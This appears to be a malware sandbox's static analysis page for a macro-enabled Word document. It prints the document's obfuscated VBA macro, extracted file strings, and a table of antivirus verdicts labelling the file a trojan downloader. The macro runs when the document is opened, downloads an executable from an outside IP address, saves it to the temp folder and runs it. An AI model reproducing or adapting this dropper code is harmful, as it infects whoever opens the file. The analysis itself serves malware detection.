popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim lllllllll1l As String
lllllllll1l = VBA.Environ(Chr(116) & Chr(101) & Chr(109) & Chr(112)) + Chr(92)
Dim lllllllll11 As String
lllllllll11 = lllllllll1l + Chr(114) & Chr(117) & Chr(110) & Chr(116) & Chr(105) & Chr(109) & Chr(101) & Chr(51) & Chr(50) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim lllllllllll: Set lllllllllll = CreateObject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
Dim llllllllll1: Set llllllllll1 = CreateObject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & _
Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
lllllllllll.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(53) & Chr(50) & Chr(46) & Chr(53) & Chr(55) & Chr(46) & Chr(56) & Chr(51) & Chr(46) & Chr(50) & Chr(52) & Chr(48) & Chr(47) & Chr(117) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(101) & Chr(51) & Chr(54) & Chr(53) & Chr(95) & Chr(48) & Chr(56) & Chr(51) & Chr(49) & Chr(48) & Chr(52) & Chr(50) & Chr(46) & Chr(101) & Chr(120) & Chr(101), False
lllllllllll.Send
With llllllllll1
.Type = 1
.Open
.write _
lllllllllll.responseBody
.savetofile lllllllll11, 2
End With
Shell (lllllllll11)
End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim lllllllll1l As String
lllllllll1l = VBA.Environ(Chr(116) & Chr(101) & Chr(109) & Chr(112)) + Chr(92)
Dim lllllllll11 As String
lllllllll11 = lllllllll1l + Chr(114) & Chr(117) & Chr(110) & Chr(116) & Chr(105) & Chr(109) & Chr(101) & Chr(51) & Chr(50) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim lllllllllll: Set lllllllllll = CreateObject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
Dim llllllllll1: Set llllllllll1 = CreateObject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & _
Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
lllllllllll.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(53) & Chr(50) & Chr(46) & Chr(53) & Chr(55) & Chr(46) & Chr(56) & Chr(51) & Chr(46) & Chr(50) & Chr(52) & Chr(48) & Chr(47) & Chr(117) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(101) & Chr(51) & Chr(54) & Chr(53) & Chr(95) & Chr(48) & Chr(56) & Chr(51) & Chr(49) & Chr(48) & Chr(52) & Chr(50) & Chr(46) & Chr(101) & Chr(120) & Chr(101), False
lllllllllll.Send
With llllllllll1
.Type = 1
.Open
.write _
lllllllllll.responseBody
.savetofile lllllllll11, 2
End With
Shell (lllllllll11)
End Sub
[Content_Types].xml
_rels/.rels
word/document.xml
{;yT=u
1eHjmj8
nAv-P1{
word/_rels/document.xml.rels
k%-:,(
nBB|A
word/footnotes.xml
"77X0(
WyzlB9
{$mmb8}
word/endnotes.xml
9qdY3
word/vbaProject.bin
QL|}
EA|Q~V
.,f)]Rcj!s
+Jj$?{
K %fq,
|q:U*,
K~ius$
DPv*J4
word/media/image1.jpeg
Adobe Photoshop 21.2 (Windows)
2021:08:10 10:36:49
Adobe_CM
dEU6te
'7GWgw
5%$IVn}.
}uOlbb
7QMMqn
pEI%)$
zPhotoshop 3.0
printOutput
PstSbool
Inteenum
printSixteenBitbool
printerNameTEXT
printProofSetupObjc
proofSetup
Bltnenum
builtinProof
proofCMYK
printOutputOptions
Cptnbool
Clbrbool
RgsMbool
CrnCbool
CntCbool
Lblsbool
Ngtvbool
EmlDbool
Intrbool
BckgObjc
Rd doub@o
Grn doub@o
Bl doub@o
BrdTUntF#Rlt
Bld UntF#Rlt
RsltUntF#Pxl@r
vectorDatabool
PgPsenum
LeftUntF#Rlt
Top UntF#Rlt
Scl UntF#Prc@Y
cropWhenPrintingbool
cropRectBottomlong
cropRectLeftlong
cropRectRightlong
cropRectToplong
boundsObjc
Top long
Leftlong
Btomlong
Rghtlong
slicesVlLs
sliceIDlong
groupIDlong
originenum
ESliceOrigin
autoGenerated
Typeenum
ESliceType
boundsObjc
Top long
Leftlong
Btomlong
Rghtlong
urlTEXT
nullTEXT
MsgeTEXT
altTagTEXT
cellTextIsHTMLbool
cellTextTEXT
horzAlignenum
ESliceHorzAlign
default
vertAlignenum
ESliceVertAlign
default
bgColorTypeenum
ESliceBGColorType
topOutsetlong
leftOutsetlong
bottomOutsetlong
rightOutsetlong
Adobe_CM
dEU6te
'7GWgw
5%$IVn}.
}uOlbb
7QMMqn
pEI%)$
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmp:CreateDate="2021-08-10T10:36:49+02:00" xmp:MetadataDate="2021-08-10T10:36:49+02:00" xmp:ModifyDate="2021-08-10T10:36:49+02:00" xmpMM:InstanceID="xmp.iid:5e3694d7-2c9d-714f-98f0-b66083b2b557" xmpMM:DocumentID="adobe:docid:photoshop:eb26cad6-e4e9-ee48-8d65-40f9e11568c6" xmpMM:OriginalDocumentID="xmp.did:1fdf3dd0-ae5d-9741-8fec-cb06099b24f5" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" dc:format="image/jpeg"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="create
XICC_PROFILE
mntrRGB XYZ
acspMSFT
IEC sRGB
Copyright (c) 1998 Hewlett-Packard Company
sRGB IEC61966-2.1
sRGB IEC61966-2.1
IEC http://www.iec.ch
IEC http://www.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
.IEC 61966-2.1 Default RGB colour space - sRGB
,Reference Viewing Condition in IEC61966-2.1
,Reference Viewing Condition in IEC61966-2.1
CRT curv
$$M$|$
dEU6te
'7GWgw
IJI2I)t
IJI2I)t
Q/II7%
RScry@
IJI2iIK
U%6w'
/Q/Q%%
oY%:C!H^
U/Y%:>
]/]%:_hN/Y
^RStd"7!f
"Tw&.Ib
''Ub0b2w
AO(mrr
'1%5HQ2
JoE%56
r zJK)J
AJ+*IL
lLkIM#Z
RaS/M!6
I)J%IA
mLmII`%
a(ILCT
K!lD6X
b+hFm(
IJ/Q/R
IM%X4&
QYRJOIWj*
#^SzJm
ZJ@^Sz
#5%2I$
^E5CqZX
[*Qm+M
[MjhWj
IJQ*J%%#x@xFyU
P/IJ-M
)oM/MKr[
ZoMOrA
=5M%9
ILa(RI%1
I)J.RQrJAaU-r
JX=KzoL
%#/H=1jm
I)J%I1IH
*IMOIA
IMA/A_
!Z jJSB
IKBhRI%1
ILa<'I%,
M)JJ]$
M)JJ]$
M)JJ]$
M)JJ]$
#boQ%&
IFSnIL
KrJe)J
PnB#oIM
(5M%)$
R[nUr{
RJh8'hGuI
*@ui)Lz0
G-Q,IHCQ
)).0[8
I%1!1j
Va(IMqJqR<%
BxI%1-P5
%",P5+
%3IGr[
RyJP=E!bJK)J
RIJT7%
M)JJ]$
IL_d(z
RSxd"6
)ILXJ;
Jj>P\J
/iBp))7
ZJF,Fe
.BxEqA
KpKzJP
lIM_E1
m*a%2I$
'pAzJ\
N-@N%%6E
!4B3RR@
ZpP!%5
4xLBJk9
]pCsRSD
`TojJs/*
P,)l))
CaKaIIE
oY/Y%6d'
nAxINu
WEaH0$
l0)lIM/A/E[-Q $
IM_E/AY
J#jIHk
kDkRS&
W9CrJG
RRyJP}D
)oM/M?
?M% yU
Bq(N%%'7
JM*a%0
GcRS&5
R(orJb
U/U%&
/U!jJL
RRoU/U
iKiII=T
RROU/UCiKiIL
{J[JJK
JJJ-De
%6iWkU*j
M)JJ]$
M)JJ]$
M)JJ]$
M)JJ]$
M)JJ]%
M)JJ]$
FQ!%5T
I/M%5YL+
mIM_E/EY
',H99rJD
%6w&.A
bJmnL\
UU/Y%7
abcbJlz
CboU%7
Cz!PzJkZU;\
'/Ah*`$
;Jx)))
+LIIBu
IMX)AV
%!p@xWMhN
I/I%4}
IMA/A^
) `Smhmz;
kj[RSS
/Y%67%
?]/]%77
l*laIM
5X(OIMK+B
hN(W}0
Ahz)zI)
oE/E%"
#RJA%"
EaN*DeI)%J
/Q8rJa
/Q!`IL
IP.IL=4
%0pA{Q
uWqL\RSo
0J#IIM
T*W*IM
?M%5[R3+E
!RJklPuj
QT7$-IM
LiIMh*L
lIM_EHR
=H=%3N
%3ICr[
%2ICr[
oKzJg)(oKzJf
%3IGrm
KzJI)(
:JRI&))R
:JRI&IJJTIQ/II%)A
%2IGr[
%2ICr[
AjsbJN
#joU%:-
,V+rJm
jFei)5J
RR9)IE
I%#.*%
S!%6jGj
hIMXHJ
%#qBqVMhn
R)*M*~
KbJjz)
lIM_E?
gb[RR6
lIMOA8
mIMqR#Y
'IJLBt
kDk!Oj
gj[RSP
xILHCs%
SlIM?A?
KbJjz)
[SmIM_E/EZ
JJGaUlr
%2IGr[
%2IGr[
%2IGrR
%2IGr[
%2IGr[
%2IGr[
%2IGr[
I%,TINP
OY/Y%6
U}E!bJloKz
&%2E%0z
oB/P6$
\=KzJO
.rJJnK
j[Q!(IH
j[Q!(IH
j[Q!(IH
j[Q!(IH
j[Q!(IH
j[Q!(IH
j[Q!4$
Y/YT.H=%7=d
j[Q!(IH
j[Q!(IH
j$$BJB
j[Q!(IH
JdmN-U
9'9%36
^aYxUm
,KaWM)
A/E%5C
b#hFeP
N(IM1R^
qRJG[U
M)JJ]$
JRIJI:I)d
hIMM8
)I'I%,
IJI:I)e
I%1(nD(O))
lH9KrJc
gj[RS\T
)&ILa(R
'I%1!D
+;SmIM
lNlAjE%36
Wb())w9V
M)JJ]$
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
WO%)(q,
Gi1J&$
tn-kZ~
0&=?y91K
XH-'t
w%2wrS.
,pk2is
V0z~GP
?wc,Fs
&8g!`h
{{k]6o
7*^z6
XA}lkI
MsOaa-p!
w%2wrS.
w6Of Dy>
n,w-$
jv>Nyc
znC2i$9
w%2wrS.
a/L%jD
[Y2{tN
I?ArI)pr~
NpVi:\
MJ~wL?X
w%2wrS.
KH&4;]
x^Ik}U
P nbZp5 OB
H29]?I
'Y`nKN
v/*]G@
0>ZZA1
3r$u*^
Nc$g\&
"S$lK*
IYbRI$
w%2wrS.
w%2wrS.
TQdRI$
fuBF%N
80jH-|
IYaRI$
eu{=,Vn
w%2wrS.
]9JVbI
UeCp,hgI
\vUHo`C
MMcZdG
i'sKIk
w%2wrS.
SW0x1p
N~DB4k
Ap__:%]7&
k{w-I$
Ve8m68
&l00;G
hn=,lF
oII>a
?4}2if
Oy.v5$
w%2wrS.
~$}'.O
>Ee|Dk
]DeQogV[
Eqf~9i
w%2wrS.
fEFYcC
+ d7/=
e64;qkX
Sy@Fp?w
/ELLjW3
^+3)~=
0k7d<1
w%2wrS.
Y$bh2B
I%);\XC
I)Ju]e'un-<H0
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
I%)$Lz
,fbe[En
w%2wrS.
z4{q+>
eyvokk
Aeb}~
`RN\12
{^jsHx0ZG
+uN,x-p
I;Z^CZ$
f6cZ2j
}<adas
IXbRI$
w%2wrS.
+un,x-sL
&"<<JI$
*|1{bZ
EY>HyI
I# Fc
QC^bDl!
w%2wrS.
sr]n5B
F>J]WQ
|g`u:=Z
VC@0[0
sr]n5B
(3&"="
;io;=6~
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
w%2wrS.
1rJg)J
%2IGr[
oIIe)C
oII%)B
oKzJg)J
KzJI)J
%2JTw&
1rJg)J
&%%/)J
KrJe)J
%7=e!r
B7 [l
Vui)Lr3^
pP!%26
bJG*m)lR
DcRR`R
IMbQ+r
LD!%"qRc
VHB{e%9
jN*IMv
?gIN{iF
N)IMCZ
R-IM'V
iIMqRqJ
@'IJI$
!(IHMi
BhIH}5!Z$'
word/theme/theme1.xml
v*hM3XU
3H[%Heq
B}[O>Y
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
word/settings.xml
!%Zvb,
[@%R%w
V#WOS*<
word/styles.xml
<x:ey(
B}p62m
IM3E*H
`Tyf`Tyf`Tyf`Tyv
r#zU"g8
'nBWZB
0utPn
word/webSettings.xml
word/fontTable.xml
1E+Y03
t~j"K}o
docProps/core.xml
fO.1qF
docProps/app.xml
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/footnotes.xmlPK
word/endnotes.xmlPK
word/vbaProject.binPK
word/media/image1.jpegPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
Proof Setup
Untitled-1
Adobe Photoshop
Adobe Photoshop 2020
#(-27;@EJOTY^chmrw|
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan VBA.Heur.ObfDldr.25.F2FC100D.Gen
FireEye VBA.Heur.ObfDldr.25.F2FC100D.Gen
CAT-QuickHeal O97M.Dropper.DZ
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-VBA.Save.Obfuscated
Trustlook Clean
BitDefender VBA.Heur.ObfDldr.25.F2FC100D.Gen
K7GW Clean
K7AntiVirus Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec ISB.Downloader!gen60
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall W2KM_BARTALEX.SMO
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba Clean
NANO-Antivirus Trojan.Script.ExpKit.exylvw
ViRobot Clean
Tencent Heur.Macro.Generic.a.60ff4585
Ad-Aware VBA.Heur.ObfDldr.25.F2FC100D.Gen
Emsisoft VBA.Heur.ObfDldr.25.F2FC100D.Gen (B)
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro W2KM_BARTALEX.SMO
McAfee-GW-Edition BehavesLike.Downloader.dh
CMC Clean
Sophos Mal/DocDl-E
SentinelOne Static AI - Malicious OPENXML
GData VBA.Heur.ObfDldr.25.F2FC100D.Gen
Jiangmin Clean
Avira HEUR/Macro.Downloader
MAX malware (ai score=80)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft TrojanDownloader:W97M/Donoff
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Avast-Mobile Clean
Cynet Malicious (score: 99)
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/WOX.Downloader.Gen
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet WM/Agent.CET!tr
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.